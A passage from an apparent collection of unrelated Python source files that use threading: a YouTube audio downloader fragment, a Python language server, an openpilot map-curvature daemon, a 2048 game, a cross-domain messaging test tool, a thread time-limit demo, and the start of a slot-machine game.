f.readline()
# as long as we didn't reach the maximum number of files
while file_count < num_files:
# get a line
line = f.readline()[:-1].split(',')
# if the line is not empty
if line[0] != "":
# get the URL and start and end points
URL = "https://www.youtube.com/watch?v=" + line[0]
start = float(line[1])
end = float(line[2])
audio_length = end - start
# get the labels from csv and clean them up
labels = []
rest = line[3:]
for i, label in enumerate(rest):
if i == 0:
label = label[2:]
if i == len(rest)-1:
label = label[:-1]
labels.append(label)
# apply label restrictions
if any(label in labels for label in restrictions):
# print("Found restricted label in {}".format(labels))
continue
if not any (label in labels for label in positives):
# print("Label not in positives!")
continue
# print("Something in {} is important and nothing restricted". format(labels))
# get the data and save it
function_args = (URL, start, audio_length, args.output_dir)
queue.put(function_args)
file_count += 1
else:
print("Nothing left!")
break
except EOFError as e:
print("End of file!")
# wait until the workers are ready
print("Waiting for threads to finish... this may take hours")
queue.join()
|
python_ls.py
|
# Copyright 2017 Palantir Technologies, Inc.
import logging
import socketserver
import threading
from jsonrpc.dispatchers import MethodDispatcher
from jsonrpc.endpoint import Endpoint
from jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)
LINT_DEBOUNCE_S = 0.5 # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10 # 10 s
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
# pylint: disable=no-member
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
def handle(self):
self.delegate.start()
def start_tcp_lang_server(bind_addr, port, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be an instance of PythonLanguageServer')
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + 'Handler',
(_StreamHandlerWrapper,),
{'DELEGATE_CLASS': handler_class}
)
server = socketserver.TCPServer((bind_addr, port), wrapper_class)
try:
log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr, port)
server.serve_forever()
finally:
log.info('Shutting down')
server.server_close()
def start_io_lang_server(rfile, wfile, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be an instance of PythonLanguageServer')
log.info('Starting %s IO language server', handler_class.__name__)
server = handler_class(rfile, wfile)
server.start()
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
"""
# pylint: disable=too-many-public-methods,redefined-builtin
def __init__(self, rx, tx):
self.workspace = None
self.config = None
self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write)
self._dispatchers = []
self._shutdown = False
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def __getitem__(self, item):
"""Override getitem to fallback through multiple dispatchers."""
if self._shutdown and item != 'exit':
# exit is the only allowed method during shutdown
log.debug("Ignoring non-exit method during shutdown: %s", item)
raise KeyError
try:
return super(PythonLanguageServer, self).__getitem__(item)
except KeyError:
# Fallback through extra dispatchers
for dispatcher in self._dispatchers:
try:
return dispatcher[item]
except KeyError:
continue
raise KeyError()
def m_shutdown(self, **_kwargs):
self._shutdown = True
return None
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def _hook(self, hook_name, doc_uri=None, **kwargs):
"""Calls hook_name and returns a list of results from all registered handlers"""
doc = self.workspace.get_document(doc_uri) if doc_uri else None
hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name, self.config.disabled_plugins)
return hook_handlers(config=self.config, workspace=self.workspace, document=doc, **kwargs)
def capabilities(self):
server_capabilities = {
'codeActionProvider': True,
'codeLensProvider': {
'resolveProvider': False, # We may need to make this configurable
},
'completionProvider': {
'resolveProvider': False, # We know everything ahead of time
'triggerCharacters': ['.']
},
'documentFormattingProvider': True,
'documentHighlightProvider': True,
'documentRangeFormattingProvider': True,
'documentSymbolProvider': True,
'definitionProvider': True,
'executeCommandProvider': {
'commands': flatten(self._hook('pyls_commands'))
},
'hoverProvider': True,
'referencesProvider': True,
'renameProvider': True,
'signatureHelpProvider': {
'triggerCharacters': ['(', ',']
},
'textDocumentSync': lsp.TextDocumentSyncKind.INCREMENTAL,
'experimental': merge(self._hook('pyls_experimental_capabilities'))
}
log.info('Server capabilities: %s', server_capabilities)
return server_capabilities
def m_initialize(self, processId=None, rootUri=None, rootPath=None, initializationOptions=None, **_kwargs):
log.debug('Language server initialized with %s %s %s %s', processId, rootUri, rootPath, initializationOptions)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ''
self.workspace = Workspace(rootUri, self._endpoint)
self.config = config.Config(rootUri, initializationOptions or {}, processId)
self._dispatchers = self._hook('pyls_dispatchers')
self._hook('pyls_initialize')
if processId is not None:
def watch_parent_process(pid):
# exist when the given pid is not alive
if not _utils.is_process_alive(pid):
log.info("parent process %s is not alive", pid)
self.m_exit()
log.debug("parent process %s is still alive", pid)
threading.Timer(PARENT_PROCESS_WATCH_INTERVAL, watch_parent_process(pid)).start()
watching_thread = threading.Thread(target=watch_parent_process, args=[processId])
watching_thread.daemon = True
watching_thread.start()
# Get our capabilities
return {'capabilities': self.capabilities()}
def m_initialized(self, **_kwargs):
pass
def code_actions(self, doc_uri, range, context):
return flatten(self._hook('pyls_code_actions', doc_uri, range=range, context=context))
def code_lens(self, doc_uri):
return flatten(self._hook('pyls_code_lens', doc_uri))
def completions(self, doc_uri, position):
completions = self._hook('pyls_completions', doc_uri, position=position)
return {
'isIncomplete': False,
'items': flatten(completions)
}
def definitions(self, doc_uri, position):
return flatten(self._hook('pyls_definitions', doc_uri, position=position))
def document_symbols(self, doc_uri):
return flatten(self._hook('pyls_document_symbols', doc_uri))
def execute_command(self, command, arguments):
return self._hook('pyls_execute_command', command=command, arguments=arguments)
def format_document(self, doc_uri):
return self._hook('pyls_format_document', doc_uri)
def format_range(self, doc_uri, range):
return self._hook('pyls_format_range', doc_uri, range=range)
def highlight(self, doc_uri, position):
return flatten(self._hook('pyls_document_highlight', doc_uri, position=position)) or None
def hover(self, doc_uri, position):
return self._hook('pyls_hover', doc_uri, position=position) or {'contents': ''}
@_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
def lint(self, doc_uri):
# Since we're debounced, the document may no longer be open
if doc_uri in self.workspace.documents:
self.workspace.publish_diagnostics(doc_uri, flatten(self._hook('pyls_lint', doc_uri)))
def references(self, doc_uri, position, exclude_declaration):
return flatten(self._hook(
'pyls_references', doc_uri, position=position,
exclude_declaration=exclude_declaration
))
def rename(self, doc_uri, position, new_name):
return self._hook('pyls_rename', doc_uri, position=position, new_name=new_name)
def signature_help(self, doc_uri, position):
return self._hook('pyls_signature_help', doc_uri, position=position)
def m_text_document__did_close(self, textDocument=None, **_kwargs):
self.workspace.rm_document(textDocument['uri'])
def m_text_document__did_open(self, textDocument=None, **_kwargs):
self.workspace.put_document(textDocument['uri'], textDocument['text'], version=textDocument.get('version'))
self._hook('pyls_document_did_open', textDocument['uri'])
self.lint(textDocument['uri'])
def m_text_document__did_change(self, contentChanges=None, textDocument=None, **_kwargs):
for change in contentChanges:
self.workspace.update_document(
textDocument['uri'],
change,
version=textDocument.get('version')
)
self.lint(textDocument['uri'])
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument['uri'])
def m_text_document__code_action(self, textDocument=None, range=None, context=None, **_kwargs):
return self.code_actions(textDocument['uri'], range, context)
def m_text_document__code_lens(self, textDocument=None, **_kwargs):
return self.code_lens(textDocument['uri'])
def m_text_document__completion(self, textDocument=None, position=None, **_kwargs):
return self.completions(textDocument['uri'], position)
def m_text_document__definition(self, textDocument=None, position=None, **_kwargs):
return self.definitions(textDocument['uri'], position)
def m_text_document__document_highlight(self, textDocument=None, position=None, **_kwargs):
return self.highlight(textDocument['uri'], position)
def m_text_document__hover(self, textDocument=None, position=None, **_kwargs):
return self.hover(textDocument['uri'], position)
def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
return self.document_symbols(textDocument['uri'])
def m_text_document__formatting(self, textDocument=None, _options=None, **_kwargs):
# For now we're ignoring formatting options.
return self.format_document(textDocument['uri'])
def m_text_document__rename(self, textDocument=None, position=None, newName=None, **_kwargs):
return self.rename(textDocument['uri'], position, newName)
def m_text_document__range_formatting(self, textDocument=None, range=None, _options=None, **_kwargs):
# Again, we'll ignore formatting options for now.
return self.format_range(textDocument['uri'], range)
def m_text_document__references(self, textDocument=None, position=None, context=None, **_kwargs):
exclude_declaration = not context['includeDeclaration']
return self.references(textDocument['uri'], position, exclude_declaration)
def m_text_document__signature_help(self, textDocument=None, position=None, **_kwargs):
return self.signature_help(textDocument['uri'], position)
def m_workspace__did_change_configuration(self, settings=None):
self.config.update((settings or {}).get('pyls', {}))
for doc_uri in self.workspace.documents:
self.lint(doc_uri)
def m_workspace__did_change_watched_files(self, **_kwargs):
# Externally changed files may result in changed diagnostics
for doc_uri in self.workspace.documents:
self.lint(doc_uri)
def m_workspace__execute_command(self, command=None, arguments=None):
return self.execute_command(command, arguments)
def flatten(list_of_lists):
return [item for lst in list_of_lists for item in lst]
def merge(list_of_dicts):
return {k: v for dictionary in list_of_dicts for k, v in dictionary.items()}
|
mapd.py
|
#!/usr/bin/env python
# thsi progran reads current gps location, find the road in openmaps and caculates the curves ahead
# it will publish the liveMapData message
# see https://towardsdatascience.com/loading-data-from-openstreetmap-with-python-and-the-overpass-api-513882a27fd0
# see https://wiki.openstreetmap.org/wiki/Template:Highways
# TODO : extend message with fields for road details (name, highway type, lanes)
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
try:
from scipy import spatial
except ImportError as e:
import os
import sys
from common.basedir import BASEDIR
openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
try:
os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path
except KeyError:
os.environ['LD_LIBRARY_PATH'] = openblas_path
args = [sys.executable]
args.extend(sys.argv)
os.execv(sys.executable, args)
import os
import sys
import time
import zmq
import threading
import numpy as np
import overpy
from collections import defaultdict
if __name__ == "__main__":
sys.path.append("/home/pi/openpilot")
from common.params import Params
from common.transformations.coordinates import geodetic2ecef
from selfdrive.services import service_list
import selfdrive.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
import selfdrive.crash as crash
from selfdrive.version import version, dirty
# Kumi offers an API for openmaps
OVERPASS_API_URL = "https://overpass.kumi.systems/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
Source: https://stackoverflow.com/a/31622038
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def build_way_query(lat, lon, radius=50):
# Builds a query to find all highways within a given radius around a point
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;
"""
return q
def query_thread():
global last_query_result, last_query_pos, cache_valid
# overpy.Overpass is an API to access openmaps data using nodes, ways and relations
# all within a search box (e.g. 4 points or a circle)
# the parm timeout and headers used in OP are not valid
# api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=10.)
api = overpy.Overpass(url=OVERPASS_API_URL)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
print (last_gps.latitude, last_gps.longitude)
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
if dist < 1000:
continue
if dist > 3000:
cache_valid = False
# print (last_gps.latitude, last_gps.longitude)
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=3000)
try:
new_result = api.query(q)
# print (q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
# print ("nodes")
# print (n.lat, n.lon)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
# print ("ways")
# print (n.lat, n.lon)
# if no nodes are found, the geodetic will generate an error
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)
query_lock.acquire()
last_query_result = None
query_lock.release()
def mapsd_thread():
# get gps location from zmq using gps or gps_external (lat, long, bearing, speed)
# calculate the curve of the road ahead, find max_speed
# and send all results to zmq
global last_gps
context = zmq.Context()
gps_sock = messaging.sub_sock(context, service_list['gpsLocation'].port, conflate=True)
gps_external_sock = messaging.sub_sock(context, service_list['gpsLocationExternal'].port, conflate=True)
map_data_sock = messaging.pub_sock(context, service_list['liveMapData'].port)
print ("Waiting for internal or external GPS in mapsd thread")
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
lat = 0
lon = 0
while True:
# wait for at least 1 GPS signal
gps_found = False
while not gps_found:
gps = messaging.recv_one_or_none(gps_sock)
gps_ext = messaging.recv_one_or_none(gps_external_sock)
if gps_ext is not None or gps is not None:
gps_found = True
else:
time.sleep(1)
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
print ("External GPS found")
else:
gps = gps.gpsLocation
print ("GPS found")
last_gps = gps
fix_ok = gps.flags & 1
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
roadName = ""
lanes = 0
surface = ""
highway = ""
# print ("none")
else:
# print ("valid")
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
print (lat, lon, heading, speed)
# find the closest road to the gps data = current way
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
# get all the details of the road
print ("cur_way=" + str(cur_way))
roadName, lanes, surface, highway = cur_way.road_details
# print ("Road details" + str(cur_way.road_details))
pnts, curvature_valid = cur_way.get_lookahead(last_query_result, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
xs = pnts[:, 0]
ys = pnts[:, 1]
# map function in python3 no longer returns a list
#road_points = map(float, xs), map(float, ys)
road_points = list(map(float, xs)), list(map(float, ys))
# minimum speed adjusted so we can use it in slower vehicles
if speed < 4:
#if speed < 10:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 10] = np.inf
curvature = 1. / radii
# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
# Outlier rejection
new_curvature = np.percentile(curvature, 90, interpolation='lower')
k = 0.6
upcoming_curvature = k * upcoming_curvature + (1 - k) * new_curvature
in_turn_indices = curvature > 0.8 * new_curvature
if np.any(in_turn_indices):
dist_to_turn = np.min(dists[in_turn_indices])
else:
dist_to_turn = 999
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
# now send the liveMapData message
dat = messaging.new_message()
dat.init('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
# print ("lastgps")
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# print ("curway")
# Speed limit
max_speed = cur_way.max_speed
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
# print ("speedlimit=" + str(max_speed))
# Road details
dat.liveMapData.roadName = roadName
dat.liveMapData.lanes = lanes
dat.liveMapData.surface = surface
dat.liveMapData.highway = highway
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
# python3 map function doesnt generate a lsit
# dat.liveMapData.roadCurvatureX = map(float, dists)
# dat.liveMapData.roadCurvature = map(float, curvature)
dat.liveMapData.roadCurvatureX = list(map(float, dists))
dat.liveMapData.roadCurvature = list(map(float, curvature))
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
def main(gctx=None):
params = Params()
dongle_id = params.get("DongleId")
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
crash.install()
setup_thread_excepthook()
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
print ("Thread started")
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
puzzle.py
|
from tkinter import *
from logic import *
from random import *
import threading
from copy import deepcopy
from time import sleep
from tkinter.messagebox import showerror, showinfo
import os
SIZE = 500
GRID_LEN = 4
GRID_PADDING = 10
BACKGROUND_COLOR_GAME = "#92877d"
BACKGROUND_COLOR_CELL_EMPTY = "#9e948a"
BACKGROUND_COLOR_DICT = {2: "#eee4da", 4: "#ede0c8", 8: "#f2b179", 16: "#f59563", \
32: "#f67c5f", 64: "#f65e3b", 128: "#edcf72", 256: "#edcc61", \
512: "#edc850", 1024: "#edc53f", 2048: "#edc22e"}
CELL_COLOR_DICT = {2: "#776e65", 4: "#776e65", 8: "#f9f6f2", 16: "#f9f6f2", \
32: "#f9f6f2", 64: "#f9f6f2", 128: "#f9f6f2", 256: "#f9f6f2", \
512: "#f9f6f2", 1024: "#f9f6f2", 2048: "#f9f6f2"}
FONT = ("Verdana", 40, "bold")
KEY_UP_ALT = "\'\\uf700\'"
KEY_DOWN_ALT = "\'\\uf701\'"
KEY_LEFT_ALT = "\'\\uf702\'"
KEY_RIGHT_ALT = "\'\\uf703\'"
KEY_UP = "'w'"
KEY_DOWN = "'s'"
KEY_LEFT = "'a'"
KEY_RIGHT = "'d'"
def show_error(e):
showerror("注意", "请检查next_step函数后继续\n报错信息:\n" + str(e))
os._exit(1)
class GameGrid(Frame):
def __init__(self):
Frame.__init__(self)
self.auto = False
try:
from main import next_step
self.next_step = next_step
self.auto = True
except (ModuleNotFoundError, ImportError):
showinfo('提示', '未发现对应函数,现在进入手动模式\n使用W,A,S,D控制')
except Exception as e:
show_error(e)
self.grid()
self.matrix = None
self.master.title('2048')
# self.gamelogic = gamelogic
self.commands = {KEY_UP: up, KEY_DOWN: down, KEY_LEFT: left, KEY_RIGHT: right,
KEY_UP_ALT: up, KEY_DOWN_ALT: down, KEY_LEFT_ALT: left, KEY_RIGHT_ALT: right}
self.commands_auto = {'up': up, 'down': down, 'left': left, 'right': right}
self.grid_cells = []
self.init_grid()
self.init_matrix()
self.update_grid_cells()
if not self.auto:
self.master.bind("<Key>", self.key_down)
else:
self.pause_flag = True
self.pause_button = Button(self, text='开始', command=self.pause)
self.pause_button.pack(side=LEFT)
Button(self, text='步进', command=self.one_step).pack(side=LEFT)
self.scale = Scale(self, from_=1, to=100, orient=HORIZONTAL)
self.scale.pack(fill=X)
self.scale.set(1)
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start()
self.mainloop()
def init_grid(self):
background = Frame(self, bg=BACKGROUND_COLOR_GAME, width=SIZE, height=SIZE)
background.pack()
for i in range(GRID_LEN):
grid_row = []
for j in range(GRID_LEN):
cell = Frame(background, bg=BACKGROUND_COLOR_CELL_EMPTY, width=SIZE / GRID_LEN, height=SIZE / GRID_LEN)
cell.grid(row=i, column=j, padx=GRID_PADDING, pady=GRID_PADDING)
# font = Font(size=FONT_SIZE, family=FONT_FAMILY, weight=FONT_WEIGHT)
t = Label(master=cell, text="", bg=BACKGROUND_COLOR_CELL_EMPTY, justify=CENTER, font=FONT, width=4,
height=2)
t.grid()
grid_row.append(t)
self.grid_cells.append(grid_row)
def gen(self):
return randint(0, GRID_LEN - 1)
def init_matrix(self):
self.matrix = new_game(4)
self.matrix = add_two(self.matrix)
self.matrix = add_two(self.matrix)
def update_grid_cells(self):
for i in range(GRID_LEN):
for j in range(GRID_LEN):
new_number = self.matrix[i][j]
if new_number == 0:
self.grid_cells[i][j].configure(text="", bg=BACKGROUND_COLOR_CELL_EMPTY)
else:
self.grid_cells[i][j].configure(text=str(new_number), bg=BACKGROUND_COLOR_DICT[new_number],
fg=CELL_COLOR_DICT[new_number])
self.update_idletasks()
def key_down(self, event):
key = repr(event.char)
if key in self.commands:
self.matrix, done = self.commands[repr(event.char)](self.matrix)
if done:
self.matrix = add_two(self.matrix)
self.update_grid_cells()
done = False
if game_state(self.matrix) == 'win':
self.grid_cells[1][1].configure(text="You", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.grid_cells[1][2].configure(text="Win!", bg=BACKGROUND_COLOR_CELL_EMPTY)
if game_state(self.matrix) == 'lose':
self.grid_cells[1][1].configure(text="You", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.grid_cells[1][2].configure(text="Lose!", bg=BACKGROUND_COLOR_CELL_EMPTY)
def generate_next(self):
index = (self.gen(), self.gen())
while self.matrix[index[0]][index[1]] != 0:
index = (self.gen(), self.gen())
self.matrix[index[0]][index[1]] = 2
def run(self):
while not self.pause_flag:
self.one_step()
if not self.scale.get() > 95:
sleep(1 / self.scale.get())
def pause(self):
if self.pause_button['text'] == '暂停':
self.pause_button['text'] = '继续'
self.pause_flag = True
elif self.pause_button['text'] == '重新开始':
del self.matrix
self.init_matrix()
self.update_grid_cells()
self.pause_button['text'] = '开始'
self.pause_flag = True
else:
self.pause_button['text'] = '暂停'
self.pause_flag = False
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start()
def one_step(self):
key = None
try:
key = self.next_step(deepcopy(self.matrix))
if key not in self.commands_auto:
show_error('请检查函数返回值!')
except Exception as e:
show_error(e)
if key in self.commands_auto:
self.matrix, done = self.commands_auto[key](self.matrix)
if done:
self.matrix = add_two(self.matrix)
self.update_grid_cells()
done = False
if game_state(self.matrix) == 'win':
self.grid_cells[1][1].configure(text="You", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.grid_cells[1][2].configure(text="Win!", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.pause_button['text'] = '重新开始'
if game_state(self.matrix) == 'lose':
self.grid_cells[1][1].configure(text="You", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.grid_cells[1][2].configure(text="Lose!", bg=BACKGROUND_COLOR_CELL_EMPTY)
self.pause_button['text'] = '重新开始'
gamegrid = GameGrid()
# for i in range(10000000):
# print('asd')
|
halperf-alt.py
|
#!/usr/bin/python3
import argparse
import time
from ctypes import *
from threading import Thread, Timer
# Open C shared libs to the datatypes; TODO: make spec-driven
xdc_so = None
gma_so = None
DATA_TYP_POS = 1
DATA_TYP_DIS = 2
class GapsTag(Structure):
_fields_ = [("mux", c_uint),
("sec", c_uint),
("typ", c_uint)]
class ClosureTrailer(Structure):
_fields_ = [('seq', c_uint),
('rqr', c_uint),
('old', c_uint),
('mid', c_ushort),
('crc', c_ushort)]
class Position(Structure):
_fields_ = [("x", c_double),
("y", c_double),
("z", c_double),
("t", ClosureTrailer)]
class Distance(Structure):
_fields_ = [("x", c_double),
("y", c_double),
("z", c_double),
("t", ClosureTrailer)]
class RptTimer(Timer):
def run(self):
while not self.finished.is_set():
self.finished.wait(self.interval)
self.function(*self.args, **self.kwargs)
self.finished.set()
def send(m, s, t, r, c):
# Context/Socket setup
makesock = xdc_so.xdc_pub_socket
makesock.restype = c_void_p
sock = makesock()
#initial values
pos = Position(-74.574489, 40.695545, 101.9, ClosureTrailer(0,0,0,0,0))
dis = Distance(-1.021, 2.334, 0.4)
tag = GapsTag(int(m),int(s),int(t))
if int(t) == 1:
adu = Position(pos.x, pos.y, pos.z, ClosureTrailer(0,0,0,0,0))
elif int(t) == 2:
adu = Distance(dis.x, dis.y, dis.z, ClosureTrailer(0,0,0,0,0))
else:
raise Exception('unsupported data typ: ' + str(t))
def task():
adu.z += 0.1
xdc_so.xdc_asyn_send(c_void_p(sock), pointer(adu), tag)
print("%f sent: [%d/%d/%d] -- (%f,%f,%f)" % (time.time(), tag.mux, tag.sec, tag.typ, adu.x, adu.y, adu.z))
rtmr = RptTimer(1.0/float(r),task).start()
def recv(m, s, t):
if int(t) == DATA_TYP_POS:
adu = Position()
elif int(t) == DATA_TYP_DIS:
adu = Distance()
else:
raise Exception('data type %d not supported' % (int(t)))
print("Subscribed to [%s/%s/%s]" % (m,s,t))
tag = GapsTag(int(m), int(s), int(t))
makesock = xdc_so.xdc_sub_socket
makesock.restype = c_void_p
sock = makesock(tag)
while(1):
xdc_so.xdc_blocking_recv(c_void_p(sock), pointer(adu), pointer(tag))
print('%f recv: [%d/%d/%d] -- (%f,%f,%f)' % (time.time(), tag.mux,tag.sec,tag.typ,adu.x,adu.y,adu.z))
def busy_sleep(s):
start = time.time()
while (time.time() < start + s):
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--send', nargs=4, action='append', metavar=('MUX', 'SEC', 'TYP', 'RATE'), help='send cross-domain flow using MUX/SEC/TYP at RATE (Hz)')
parser.add_argument('-r', '--recv', nargs=3, action='append', metavar=('MUX', 'SEC', 'TYP'), help='recv cross-domain flow mapped to MUX/SEC/TYP')
parser.add_argument('-c', metavar=('COUNT'), help="packets to sent (default=no limit)", type=int, default=-1)
parser.add_argument('-l', metavar=('PATH'), help="path to mission app shared libraries (default=../appgen)", default='../appgen')
parser.add_argument('-x', metavar=('PATH'), help="path to libxdcomms.so (default=../api)", default='../api')
parser.add_argument('-i', metavar=('URI'), help="in URI (default=ipc:///tmp/halpub1)", default='ipc:///tmp/halpub1')
parser.add_argument('-o', metavar=('URI'), help="out URI (default=ipc:///tmp/halsub1)", default='ipc:///tmp/halsub1')
args = parser.parse_args()
xdc_so = CDLL(args.x + '/libxdcomms.so', use_errno=True)
gma_so = CDLL(args.l + '/libgma.so')
# Set the URIs for ZMQ
xdc_so.xdc_ctx()
xdc_so.xdc_set_in(c_char_p((args.i).encode('utf-8')))
xdc_so.xdc_set_out(c_char_p((args.o).encode('utf-8')))
# Register encode/decode functions; TODO: make spec-driven
xdc_so.xdc_register(gma_so.position_data_encode, gma_so.position_data_decode, DATA_TYP_POS)
xdc_so.xdc_register(gma_so.distance_data_encode, gma_so.distance_data_decode, DATA_TYP_DIS)
if args.send:
for s in args.send:
s.append(args.c)
t = Thread(args=s, target=send)
t.start()
if args.recv:
for r in args.recv:
t = Thread(args=r, target=recv)
t.start()
|
code_execution_with_time_limit.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import threading
def run():
import time
i = 1
# Бесконечный цикл
while True:
print(i)
i += 1
time.sleep(1)
if __name__ == '__main__':
thread = threading.Thread(target=run, daemon=True)
thread.start()
# Wait
thread.join(5)
print('Quit!')
|
game.py
|
import threading
from matplotlib.pyplot import step
from numpy.core.numeric import Inf
from wheel import reel
import random
from typing import List
import time
import os
import numpy as np
__price = 0
__game_count = 0
__num_of_line = Inf
def reset():
global __game_count,__price
__price = 0
__game_count = 0
def start_spinning(threads:List[threading.Thread],reels:List[reel],mode = 0):
global __game_count
if check_game_status(threads) == 0 or check_game_status(threads) == 2:
threads.clear()
__game_count += 1
for i in range(len(reels)):
reels[i].stop = False
threads.append(threading.Thread(target=reels[i].spin, args = (random.randint(25,60),mode,)))
threads[i].daemon = True
threads[i].start()
def stop_wheel(threads:List[threading.Thread],reels:List[reel],all = False):
if check_game_status(threads) == 1:
for i in range(len(reels)):
if threads[i].is_alive():
reels[i].stop = True
print("STOP")
if all == False:
break
def check_game_status(threads:List[threading.Thread]):
if len(threads) == 0:
return 0
for i in threads:
if i.is_alive():
return 1
return 2
# 0 -> first game
# 1 -> running
# 2 -> finish
def check_results(reels:List[reel]):
matrix = []
for i in range(len(reels)):
matrix.append(reels[i].reel)
matrix = np.array(matrix)
diag = []
diag2 = []
line = []
for i in range(len(matrix)):
diag.append(matrix[i][i])
diag2.append(matrix[i][(len(matrix)-i-1)])
# line 1 - n
